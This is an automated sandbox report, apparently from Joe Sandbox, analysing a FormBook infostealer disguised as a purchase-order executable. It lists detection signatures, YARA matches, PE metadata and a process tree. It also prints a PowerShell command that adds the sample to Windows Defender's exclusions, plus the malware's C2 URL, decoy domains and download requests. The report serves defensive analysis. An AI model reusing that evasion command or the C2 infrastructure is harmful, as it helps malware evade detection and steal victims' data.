Loading ...

Play interactive tourEdit tour

Analysis Report Purchase_order_397484658464974945648447564845.exe

Overview

General Information

Sample Name:Purchase_order_397484658464974945648447564845.exe
Analysis ID:356528
MD5:9d8635210670e8b332120a969dfa269e
SHA1:968d4d600dd00579f6594e3b1eff98b46b422893
SHA256:031e72b45d66c3365bfe3c7ace3c4c2a79facffa8daa7b483c77350a791c0133
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Adds a directory exclusion to Windows Defender
Binary contains a suspicious time stamp
C2 URLs / IPs found in malware configuration
Contains functionality to hide a thread from the debugger
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Purchase_order_397484658464974945648447564845.exe (PID: 6392 cmdline: 'C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe' MD5: 9D8635210670E8B332120A969DFA269E)
    • powershell.exe (PID: 6948 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 7096 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 5532 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • WerFault.exe (PID: 2576 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6392 -s 964 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.aubonmarcheduparc.com/rina/"], "decoy": ["syndicauto.net", "techvorx.com", "palletrackingvancouver.com", "pricetrackerindia.com", "photocravings.com", "jenniferlwilsonrn.com", "cartucce-toner.com", "fred-auto-sport.com", "aletheajean.com", "beautyhacks.website", "seoalmaguer.com", "cursoencasa.net", "flex-eg.com", "dygdreams.com", "magnoliadawson.com", "whitehouseeffectband.com", "visualtrigger.art", "kalinahybridseeds.com", "glacesnamur.com", "drbordogna.com", "wealthtells.com", "opaoman.xyz", "ieltsjo.com", "graphicoustic.com", "jimboprivacy.com", "blockchainclood.com", "aulsgdcqg.icu", "swipeonyourself.com", "mccraft.club", "scirispartner.com", "mlinkstec.com", "allungamentopene.net", "quailridgeminischnauzers.com", "teensatoz.com", "3rud.net", "921squirecourt.com", "informaticas.net", "unicorndragonlearning.com", "duniatone.com", "abmzc023.com", "meteorproductions.com", "pinkcouturecollection.com", "dealsaction.store", "kailarosales.com", "maya-watches.com", "ladyunivers.com", "magenx2.info", "3ppschool.com", "panl.online", "intelligenten.com", "pepintre.com", "safarimadeira.info", "westglobalpartners.com", "tamilfgun.com", "upholsteredwineracks.com", "superdoctormk.club", "newfacesatv.info", "play-morepools.com", "allservice.center", "ladyandpen.com", "textileetobjet.com", "dallasgains.com", "littledeviltrainingcollar.com", "liquid-metalworks.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.267253843.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000C.00000002.267253843.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000C.00000002.267253843.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.293197269.00000000044EF000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.293197269.00000000044EF000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x86b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8a52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14765:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14251:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14867:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x149df:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x946a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x134cc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa1e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19857:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 4 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.unpackMalware Configuration Extractor: FormBook {"C2 list": ["www.aubonmarcheduparc.com/rina/"], "decoy": ["syndicauto.net", "techvorx.com", "palletrackingvancouver.com", "pricetrackerindia.com", "photocravings.com", "jenniferlwilsonrn.com", "cartucce-toner.com", "fred-auto-sport.com", "aletheajean.com", "beautyhacks.website", "seoalmaguer.com", "cursoencasa.net", "flex-eg.com", "dygdreams.com", "magnoliadawson.com", "whitehouseeffectband.com", "visualtrigger.art", "kalinahybridseeds.com", "glacesnamur.com", "drbordogna.com", "wealthtells.com", "opaoman.xyz", "ieltsjo.com", "graphicoustic.com", "jimboprivacy.com", "blockchainclood.com", "aulsgdcqg.icu", "swipeonyourself.com", "mccraft.club", "scirispartner.com", "mlinkstec.com", "allungamentopene.net", "quailridgeminischnauzers.com", "teensatoz.com", "3rud.net", "921squirecourt.com", "informaticas.net", "unicorndragonlearning.com", "duniatone.com", "abmzc023.com", "meteorproductions.com", "pinkcouturecollection.com", "dealsaction.store", "kailarosales.com", "maya-watches.com", "ladyunivers.com", "magenx2.info", "3ppschool.com", "panl.online", "intelligenten.com", "pepintre.com", "safarimadeira.info", "westglobalpartners.com", "tamilfgun.com", "upholsteredwineracks.com", "superdoctormk.club", "newfacesatv.info", "play-morepools.com", "allservice.center", "ladyandpen.com", "textileetobjet.com", "dallasgains.com", "littledeviltrainingcollar.com", "liquid-metalworks.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Purchase_order_397484658464974945648447564845.exeVirustotal: Detection: 40%Perma Link
          Source: Purchase_order_397484658464974945648447564845.exeReversingLabs: Detection: 31%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000C.00000002.267253843.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.293197269.00000000044EF000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.289325554.0000000003F69000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: Purchase_order_397484658464974945648447564845.exeJoe Sandbox ML: detected
          Source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2

          Compliance:

          barindex
          Uses 32bit PE filesShow sources
          Source: Purchase_order_397484658464974945648447564845.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
          Source: Purchase_order_397484658464974945648447564845.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Binary contains paths to debug symbolsShow sources
          Source: Binary string: System.Core.ni.pdbRSDSD source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: System.Xml.ni.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: System.ni.pdbRSDS source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.PDB source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.281116526.0000000000F87000.00000004.00000010.sdmp
          Source: Binary string: wntdll.pdbUGP source: Purchase_order_397484658464974945648447564845.exe, 0000000C.00000002.268109455.00000000016E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Purchase_order_397484658464974945648447564845.exe, 0000000C.00000002.268109455.00000000016E0000.00000040.00000001.sdmp
          Source: Binary string: System.Configuration.ni.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: mscorlib.ni.pdbRSDS source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: jVisualBasic.pdb source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.281116526.0000000000F87000.00000004.00000010.sdmp
          Source: Binary string: System.Configuration.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: System.Xml.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: System.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.283343241.0000000001171000.00000004.00000020.sdmp
          Source: Binary string: Microsoft.VisualBasic.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: System.Core.ni.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: Purchase_order_397484658464974945648447564845.PDB source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.281116526.0000000000F87000.00000004.00000010.sdmp
          Source: Binary string: System.Windows.Forms.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb13 source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.283343241.0000000001171000.00000004.00000020.sdmp
          Source: Binary string: mscorlib.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.283343241.0000000001171000.00000004.00000020.sdmp
          Source: Binary string: System.Drawing.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: mscorlib.ni.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: System.Core.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: .pdbHh source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.281116526.0000000000F87000.00000004.00000010.sdmp
          Source: Binary string: System.Xml.ni.pdbRSDS source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: System.ni.pdb source: WERFC3.tmp.dmp.15.dr
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.aubonmarcheduparc.com/rina/
          Source: global trafficHTTP traffic detected: GET /base/23DEF5FFA542BB2D1BCA37F7C5ECC686.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /base/C02C82A7124B198823DC14A0727ADA5A.html HTTP/1.1Host: coroloboxorozor.com
          Source: Joe Sandbox ViewIP Address: 104.21.71.230 104.21.71.230
          Source: global trafficHTTP traffic detected: GET /base/23DEF5FFA542BB2D1BCA37F7C5ECC686.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /base/C02C82A7124B198823DC14A0727ADA5A.html HTTP/1.1Host: coroloboxorozor.com
          Source: unknownDNS traffic detected: queries for: coroloboxorozor.com
          Source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.286130454.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com
          Source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.286130454.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com/base/23DEF5FFA542BB2D1BCA37F7C5ECC686.html
          Source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.286130454.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com/base/C02C82A7124B198823DC14A0727ADA5A.html
          Source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.286130454.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000C.00000002.267253843.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.293197269.00000000044EF000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.289325554.0000000003F69000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000C.00000002.267253843.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.267253843.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.293197269.00000000044EF000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.293197269.00000000044EF000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.289325554.0000000003F69000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.289325554.0000000003F69000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: Purchase_order_397484658464974945648447564845.exe
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 0_2_015096C8 NtSetInformationThread,
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 0_2_0150B60D NtSetInformationThread,
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 0_2_0150B6D0 NtSetInformationThread,
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_004182F0 NtClose,
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_0041826A NtReadFile,
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_0041831B NtReadFile,
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 0_2_00BDA434
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 0_2_0150D290
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_00401030
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_0041C1B8
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_0041A2F3
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_00408C5C
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_00408C60
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_0041BC7D
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_0041B5E2
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_00402D90
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_0041C7F0
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_0041BF92
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_00402FB0
          Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6392 -s 964
          Source: Purchase_order_397484658464974945648447564845.exeBinary or memory string: OriginalFilename vs Purchase_order_397484658464974945648447564845.exe
          Source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000000.211406162.0000000000B52000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBPxnwGrR.exe2 vs Purchase_order_397484658464974945648447564845.exe
          Source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.289325554.0000000003F69000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRFkL BUJ.exe2 vs Purchase_order_397484658464974945648447564845.exe
          Source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.293197269.00000000044EF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPeBraba.dll6 vs Purchase_order_397484658464974945648447564845.exe
          Source: Purchase_order_397484658464974945648447564845.exeBinary or memory string: OriginalFilename vs Purchase_order_397484658464974945648447564845.exe
          Source: Purchase_order_397484658464974945648447564845.exe, 0000000C.00000002.267253843.0000000000400000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameRFkL BUJ.exe2 vs Purchase_order_397484658464974945648447564845.exe
          Source: Purchase_order_397484658464974945648447564845.exe, 0000000C.00000002.269183019.000000000198F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase_order_397484658464974945648447564845.exe
          Source: Purchase_order_397484658464974945648447564845.exe, 0000000C.00000000.264656959.0000000000CE2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBPxnwGrR.exe2 vs Purchase_order_397484658464974945648447564845.exe
          Source: Purchase_order_397484658464974945648447564845.exeBinary or memory string: OriginalFilenameBPxnwGrR.exe2 vs Purchase_order_397484658464974945648447564845.exe
          Source: Purchase_order_397484658464974945648447564845.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 0000000C.00000002.267253843.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.267253843.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.293197269.00000000044EF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.293197269.00000000044EF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.289325554.0000000003F69000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.289325554.0000000003F69000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@12/9@1/1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20210223Jump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6392
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6988:120:WilError_01
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zj10wm5e.0o0.ps1Jump to behavior
          Source: Purchase_order_397484658464974945648447564845.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
